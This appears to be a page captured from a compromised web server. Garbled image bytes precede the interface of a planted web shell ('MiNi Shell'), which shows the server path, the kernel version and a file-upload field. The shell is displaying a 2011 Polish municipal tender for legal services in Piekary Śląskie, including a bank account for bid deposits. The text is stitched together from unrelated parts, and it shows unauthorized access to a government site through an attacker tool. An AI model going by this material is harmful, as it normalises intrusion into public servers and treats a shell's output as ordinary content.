JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/426476-N-2011.html

<p class="kh_header"><b>Piekary Śląskie: Obsługa prawna Urzędu Miasta Piekary Śląskie oraz miejskich jednostek organizacyjnych.</b><br>
<b>Numer ogłoszenia: 426476 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa prawna Urzędu Miasta Piekary Śląskie oraz miejskich jednostek organizacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Obsługa prawna Urzędu Miasta Piekary Śląskie oraz niżej wymienionych miejskich jednostek organizacyjnych:
1) Miejskie Przedszkole nr 1 w Piekarach Śląskich
2) Miejskie Przedszkole nr 2 w Piekarach Śląskich
3) Miejskie Przedszkole nr 3 w Piekarach Śląskich
4) Miejskie Przedszkole nr 4 w Piekarach Śląskich
5) Miejskie Przedszkole nr 5 w Piekarach Śląskich
6) Miejskie Przedszkole nr 7 w Piekarach Śląskich
7) Miejskie Przedszkole nr 8 w Piekarach Śląskich
8) Miejskie Przedszkole nr 10 w Piekarach Śląskich
9) Miejskie Przedszkole nr 11 w Piekarach Śląskich
10) Miejskie Przedszkole nr 12 w Piekarach Śląskich
11) Miejskie Przedszkole nr 13 w Piekarach Śląskich
12) Miejskie Przedszkole nr 15 w Piekarach Śląskich
13) Miejskie Przedszkole nr 17 w Piekarach Śląskich
14) Miejska Szkoła Podstawowa nr 1 w Piekarach Śląskich
15) Zespół Szkolno-Przedszkolny nr 1 w Piekarach Śląskich
16) Zespół Szkolno-Przedszkolny nr 2 w Piekarach Śląskich
17) Miejska Szkoła Podstawowa nr 5 w Piekarach Śląskich
18) Miejska Szkoła Podstawowa nr 9 w Piekarach Śląskich
19) Miejska Szkoła Podstawowa nr 11 w Piekarach Śląskich
20) Miejska Szkoła Podstawowa nr 12 w Piekarach Śląskich
21) Miejska Szkoła Podstawowa nr 13 w Piekarach Śląskich
22) Miejska Szkoła Podstawowa nr 14 w Piekarach Śląskich
23) Miejska Szkoła Podstawowa nr 15 w Piekarach Śląskich
24) Zespół Szkół im. Grzegorzewskiej w Piekarach Śląskich
25) Miejskie Gimnazjum nr 1 w Piekarach Śląskich
26) Miejskie Gimnazjum nr 2 w Piekarach Śląskich
27) Miejskie Gimnazjum nr 3 w Piekarach Śląskich
28) Miejskie Gimnazjum nr 4 w Piekarach Śląskich
29) Zespół Szkół nr 1 w Piekarach Śląskich
30) I Liceum Ogólnokształcące im. Jana III Sobieskiego w Piekarach Śląskich
31) Zasadnicza Szkoła Zawodowa w Piekarach Śląskich,
32) Dom Dziecka w Piekarach Śląskich,
33) Miejska Biblioteka Publiczna w Piekarach Śląskich,
34) Poradnia Psychologiczno - Pedagogiczna w Piekarach Śląskich,
35) Zakład Ekonomiczno - Finansowej Obsługi Placówek Oświatowych w Piekarach Śląskich,
36) Żłobek Miejski w Piekarach Śląskich.
Obsługa prawna obejmuje w szczególności:
a) udział w opracowywaniu i uzgadnianiu projektów uchwał Rady Miasta i zarządzeń
    Prezydenta Miasta, opiniowanie ich pod względem redakcyjnym i formalno-prawnym,
b) sporządzanie projektów przepisów gminnych w sprawach szczególnie skomplikowanych,
c) udział w sesjach Rady Miasta, świadczenie pomocy prawnej w ich trakcie, udział
    w posiedzeniach komisji według zapotrzebowania,
d) reprezentowanie Zamawiającego przed sądami powszechnymi i szczególnymi, organami administracji publicznej oraz innymi organami i instytucjami (w tym Krajowej Izbie Odwoławczej przy Prezesie Urzędu Zamówień Publicznych oraz sądami polubownymi lub mediatorami), jak również przed organami egzekucyjnymi,
e) udzielanie porad prawnych  i konsultacji prawnych, 
f)  udzielanie wyjaśnień w zakresie stosowania prawa,
g) wydawanie opinii prawnych,
h) opiniowanie projektów: umów, porozumień, statutów, regulaminów, upoważnień,
    pełnomocnictw i zarządzeń,
i) sporządzanie projektów umów cywilnoprawnych w sprawach szczególnie skomplikowanych,
j) uczestnictwo w prowadzonych przez Zamawiającego rokowaniach i negocjacjach,
k) świadczenie pomocy prawnej w trakcie narad Prezydenta Miasta,
l)  opiniowanie treści korespondencji Urzędu z organami administracji publicznej, sądami i innymi instytucjami oraz osobami prawnymi i fizycznymi w sprawach szczególnie skomplikowanych,
m)wykonywanie nadzoru prawnego nad egzekucją należności Zamawiającego oraz
    współdziałanie w podejmowaniu czynności w zakresie postępowania egzekucyjnego,
n) zapewnienie dalszego prowadzenia i reprezentacji we wszystkich sprawach będących w toku, postępowaniach sądowych, administracyjnych lub innych, jak również i innych rozpoczętych przed udzieleniem zamówienia.
2. Wykonawca zobowiązuje się wykonywać ww. czynności bez zbędnej zwłoki, przy czym ustala się terminy wyrażone w dniach, dla czynności wymienionych w: lit.a) 7 dni, w sprawach szczególnie skomplikowanych 10 dni, lit. b) 10 dni, lit. g) 5 dni, w sprawach szczególnie skomplikowanych 7 dni, w sprawach dotyczących  zamówień publicznych 4 dni, lit h) 3 dni, lit i) 10 dni, lit. l) 10 dni.
3. Wykonawca będzie wykonywał ww czynności  w terminach gwarantujących ich należyte wykonanie, z należytą starannością wymaganą przy świadczeniu tego rodzaju usług i z należytą troską o finanse publiczne oraz interes prawny Zamawiającego.
4. Wykonawca zobowiązuje się do zapewnienia minimalnego standardu świadczonych usług, na okoliczność czego:
  a/ wyznacza koordynatora obsługi prawnej jako odpowiedzialnego za całokształt spraw związanych z realizacją postanowień niniejszej umowy,
b/ zapewnia świadczenie w siedzibie Zamawiającego w sposób stały obsługi prawnej przez radcę prawnego/adwokata oraz przez aplikanta radcowskiego/adwokackiego przez 6 godzin w każdym dniu roboczym, według ustalonego z Zamawiającym harmonogramu pracy,
c/ zapewnia kontakt telefoniczny w pozostałych godzinach urzędowania Zamawiającego pod wskazanymi numerami telefonów,
d/ zapewnia obsługę prawną poza siedzibą Urzędu Miasta, jeżeli jest to niezbędne do
  wykonania określonej czynności.
5.Osoby, o których mowa w pkt 4, zobowiązane będą podporządkować się w niezbędnym zakresie wszelkim postanowieniom określającym organizację pracy w Urzędzie Miasta w Piekarach Śląskich.
6.Zmiana radców prawnych wykazanych przez Wykonawcę w harmonogramie pracy do
   obsługi Urzędu jest możliwa po złożeniu pisemnego wniosku będzie  wymagała wyrażenia zgody przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany  jest  wnieść wadium w wysokości 10 000,00 zł (słownie: dziesięciu tysięcy złotych 00/100).
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.: w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym  że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 ze zm.).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
    Bank: ING Bank Śląski S.A. O/ Piekary Śląskie 
    NR Rachunku: 07 1050 1230 1000 0023 2549 4256
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6. Niewniesienie wadium w terminie lub wniesienie go w sposób inny niż określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.

 DO OFERTY NALEŻY ZAŁĄCZYĆ DOKUMENT POTWIERDZAJĄCY WNIESIENIE WADIUM.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia polegającym na wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, z należytą starannością, co najmniej dwóch usług polegających na świadczeniu stałej obsługi prawnej w gminach miejskich na prawach powiatu, o wielkości co najmniej 50 tys. mieszkańców, trwającej co najmniej 12 miesięcy o wartości co najmniej 200 000,00 zł brutto (każda);

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia, polegającym na wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert z należytą starannością, co najmniej jednej usługi polegającej na świadczeniu stałej obsługi prawnej w jednostce organizacyjnej gminy miejskiej na prawach powiatu lub spółce prawa handlowego z udziałem gminy miejskiej na prawach powiatu, z zakresu oświaty;

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia, polegającym na wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert z należytą starannością, co najmniej jednej usługi polegającej na świadczeniu stałej obsługi prawnej w jednostce organizacyjnej gminy miejskiej na prawach powiatu, z zakresu pomocy społecznej;

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania  przedmiotu zamówienia, polegającym na wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert z należytą starannością, co najmniej jednej usługi polegającej na świadczeniu pomocy prawnej przy utworzeniu spółki prawa handlowego z wyłącznym lub większościowym udziałem gminy miejskiej na prawach powiatu;

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia, polegającym na wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert z należytą starannością, co najmniej jednej usługi polegającej na świadczeniu pomocy prawnej przy połączeniu lub likwidacji spółki prawa handlowego z wyłącznym lub większościowym udziałem gminy miejskiej na prawach powiatu;

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia, polegającym na wykonaniu/wykonywaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert z należytą starannością, co najmniej jednej usługi polegającej na świadczeniu pomocy prawnej na rzecz jednostki samorządu terytorialnego występującej w postępowaniu karnym w roli pokrzywdzonego;

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia polegającym na reprezentacji jednostki samorządu terytorialnego w co najmniej jednym postępowaniu przed Krajową Izbą Odwoławczą przy Prezesie Urzędu Zamówień Publicznych w okresie ostatnich 3 lat przed terminem składania ofert;

-  Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonywania przedmiotu zamówienia polegającym na prowadzeniu w imieniu jednostki samorządu terytorialnego w okresie ostatnich 3 lat przed terminem składania ofert co najmniej jednej sprawy dotyczącej szkód górniczych o wartości sporu nie mniejszej niż 3 500 000,00 zł;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest dysponowanie co najmniej 3 osobami z uprawnieniami adwokata i/lub radcy prawnego oraz co najmniej dwoma aplikantami adwokackimi/radcowskimi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że
wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności, wymagane jest posiadanie ww. dokumentu o wartości nie mniejszej niż 
3 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Koncepcja - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie ul.Bytomska 84 pokój 218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2011 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie ul.Bytomska 84 pokój 218.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com